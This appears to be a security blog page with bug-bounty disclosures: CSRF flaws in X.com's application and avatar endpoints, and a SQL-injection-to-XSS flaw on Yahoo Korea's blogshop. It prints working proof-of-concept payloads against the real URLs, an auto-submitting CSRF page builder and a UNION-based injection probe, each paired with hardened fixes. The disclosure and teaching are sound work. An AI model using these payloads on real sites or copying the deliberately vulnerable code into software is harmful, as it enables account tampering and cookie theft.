Add new Application & Change User’s Avatar CSRF Vulnerability – X.com

July 19, 2013
The X.com bug bounty runs under the PayPal bug bounty program, and I was paid for the two reports below.
Bug 1: Add new Application
X.com lets a user add a new application from the account settings page. The form that does this carries no CSRF token, so a logged-in user who visits an attacker-controlled page can have an application added to their account without their knowledge; the victim sees no prompt and the server cannot tell the forged request from a genuine one.
CSRF Vulnerable URL : https://www.x.com/user/my-account/applications/new

To reproduce this vulnerability I have attached a proof of concept.

Direct Download Link of POC:

https://dl.dropbox.com/u/18007092/x.com%20CSRF%20new%20Application.html

Bug 2: Change User's Avatar
X.com allows a user to change their default avatar.
The avatar change module also has no CSRF token, so it can be used to set a victim's default avatar to one of the attacker's choosing. Because the endpoint accepts a plain GET, the request can be triggered by the form below, by a link, or by any element that loads the URL.
CSRF Vulnerable URL : https://www.x.com/user/select_avatar/2
POC :
<!-- Avatar CSRF PoC: the trailing path segment (2) is the avatar id that gets forced on the victim -->
<form action="https://www.x.com/user/select_avatar/2" method="GET">
<input type="submit" name="submit">
</form>
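Both bugs are the same class of flaw: a state-changing endpoint that trusts the session cookie alone. The following is an added example for this write-up, not code from X.com or PayPal. It generalises the attached PoC into an auto-submitting form builder (with method GET and no parameters it produces the avatar PoC above) and models, side by side, the reported handler behaviour and a hardened handler that requires POST, a same-origin check, and a synchronizer token compared in constant time. The Request/Session model, ALLOWED_ORIGIN and the handler names are assumptions made for the example.

```python
"""CSRF on X.com-style endpoints: the PoC generalised, and a hardened handler.

Added example for this write-up, not X.com or PayPal code. Request, Session,
ALLOWED_ORIGIN and the handler names are assumptions for illustration.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from html import escape
from typing import Optional
from urllib.parse import urlsplit

ALLOWED_ORIGIN = "https://www.x.com"  # assumption: only origin allowed to drive state changes


def build_csrf_poc(action: str, method: str = "POST", params: Optional[dict] = None) -> str:
    """Build an auto-submitting page like the attached PoC, for any endpoint.

    GET with no params reproduces the avatar PoC above, except the form submits
    itself as soon as the page loads instead of waiting for a click.
    """
    inputs = "".join(
        f'<input type="hidden" name="{escape(k)}" value="{escape(v)}">'
        for k, v in (params or {}).items()
    )
    return (
        f'<form id="f" action="{escape(action)}" method="{escape(method)}">'
        f"{inputs}</form><script>document.getElementById('f').submit()</script>"
    )


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)  # e.g. Origin, Referer
    form: dict = field(default_factory=dict)     # POST body fields
    cookie_session_id: str = "sess-1"            # the browser attaches this even cross-site


@dataclass
class Session:
    user: str
    avatar: int = 1
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def select_avatar_vulnerable(req: Request, session: Session, avatar_id: int) -> bool:
    """Models the reported behaviour: any request carrying the session cookie wins."""
    session.avatar = avatar_id
    return True


def select_avatar_hardened(req: Request, session: Session, avatar_id: int) -> bool:
    """Change state only on POST from the allowed origin with a matching token."""
    if req.method != "POST":
        return False
    # Browsers send Origin on cross-site POSTs; fall back to the Referer's origin.
    origin = req.headers.get("Origin")
    if origin is None and "Referer" in req.headers:
        parts = urlsplit(req.headers["Referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin != ALLOWED_ORIGIN:
        return False
    token = req.form.get("csrf_token", "")
    # Constant-time comparison of the submitted token against the session's token.
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return False
    session.avatar = avatar_id
    return True


def demo() -> tuple:
    """Cross-site GET against both handlers, then a legitimate same-site POST."""
    session = Session(user="victim")
    # Constructed request: what the browser sends when the PoC page on evil.example loads.
    cross_site = Request("GET", "/user/select_avatar/2",
                         headers={"Referer": "https://evil.example/poc.html"})
    vuln_accepted = select_avatar_vulnerable(cross_site, session, 2)
    hard_rejected = not select_avatar_hardened(cross_site, session, 2)
    legit = Request("POST", "/user/select_avatar/2",
                    headers={"Origin": ALLOWED_ORIGIN},
                    form={"csrf_token": session.csrf_token})
    legit_accepted = select_avatar_hardened(legit, session, 3)
    return vuln_accepted, hard_rejected, legit_accepted


if __name__ == "__main__":
    print(build_csrf_poc("https://www.x.com/user/select_avatar/2", "GET"))
    print(demo())
```

The origin check matters even once a token exists: a token that leaks (for example through a separate XSS) is still useless from another origin, and the POST-only rule removes the image-tag and link variants of the avatar PoC entirely.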
Thank you PayPal & X.com for running such a good program – g4h Team.
We Provide Penetration Testing

Yahoo Korea SQL XSS vulnerability

August 9, 2011

Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed

Overview:

Yahoo Korea's Blog-shop is one of the most popular Yahoo sub-domains in Korea.
This is a cross-site scripting (XSS) vulnerability, reached through SQL injection, affecting blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.

Exploit Description :

The key parameter of the notice_read.html script is vulnerable to SQL injection. Because the selected column values are echoed into the page unescaped, placing JavaScript in the UNION SELECT payload turns the injection into a reflected XSS, which I used to retrieve Yahoo users' cookies.

POC (Proof Of Concept ):

http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16'/**/UNION/**/SELECT/**/1,2,3,4,@@version,%3Cscript%3Ealert('XSS HERE');</script>,7,8,9,0,1,2,3,4,5,6,7--%20

Screenshot: Yahoo Korea XSS
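The payload above is a UNION-based injection with one value per column of the original query (17 of them), a database version probe (MySQL's @@version) and a script tag in a column the page prints. The following is an added example for this write-up, not Yahoo's code, that reproduces the chain on a constructed sqlite3 notice table: it probes the column count the way such a payload is built, shows the string-built query reflecting the script tag into the page, and shows the parameterised, output-escaped version of the same page treating the payload as an unknown key. The table, its four columns, the render functions and sqlite_version() in place of @@version are all assumptions of the example.

```python
"""SQL injection that lands as reflected XSS, modelled on notice_read.html?key.

Added example for this write-up, not Yahoo's code. The notice table, its four
columns and the render functions are constructed stand-ins; the original
needed 17 columns and used MySQL's @@version, sqlite3 has sqlite_version().
"""
import html
import sqlite3

# Constructed sample data: a small notice board with four columns.
SCHEMA = """
CREATE TABLE notice (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
INSERT INTO notice VALUES (16, 'Welcome', 'Shop opening hours', 'admin');
"""

# Same shape as the page's payload: a key that matches nothing, a UNION with one
# value per column, a version probe, a script tag in an echoed column, a comment.
XSS_PAYLOAD = "-16' UNION SELECT 1,sqlite_version(),'<script>alert(1)</script>',4-- "


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def render_vulnerable(conn: sqlite3.Connection, key: str) -> str:
    """String-built query plus unescaped output: the injected row is printed as-is."""
    sql = f"SELECT id, title, body, author FROM notice WHERE id = '{key}'"  # vulnerable by design
    rows = conn.execute(sql).fetchall()
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p><small>{r[3]}</small>" for r in rows)


def find_column_count(conn: sqlite3.Connection, max_cols: int = 32) -> int:
    """Probe the column count the way a 17-column payload gets built: grow a
    UNION SELECT of NULLs until the database stops rejecting the query."""
    for n in range(1, max_cols + 1):
        probe = "-16' UNION SELECT " + ",".join(["NULL"] * n) + "-- "
        try:
            render_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:  # column-count mismatch on UNION
            continue
    raise RuntimeError("no column count found")


def render_hardened(conn: sqlite3.Connection, key: str) -> str:
    """Parameterised query and HTML-escaped output; the payload is just an unknown key."""
    rows = conn.execute(
        "SELECT id, title, body, author FROM notice WHERE id = ?", (key,)
    ).fetchall()
    return "".join(
        f"<h1>{html.escape(r[1])}</h1><p>{html.escape(r[2])}</p><small>{html.escape(r[3])}</small>"
        for r in rows
    )


def demo() -> tuple:
    """Does the script tag reach the page? (vulnerable, hardened)"""
    conn = open_db()
    vuln = render_vulnerable(conn, XSS_PAYLOAD)
    hard = render_hardened(conn, XSS_PAYLOAD)
    return "<script>" in vuln, "<script>" in hard


if __name__ == "__main__":
    c = open_db()
    print("columns:", find_column_count(c))
    print(render_vulnerable(c, XSS_PAYLOAD))
    print(demo())
```

Both fixes are needed: the parameterised query alone stops the injection, but a stored notice containing markup would still be reflected without the escaping, and escaping alone leaves the version probe and the rest of the database readable through the UNION.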

Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)

Regards

Sandeep Kamble
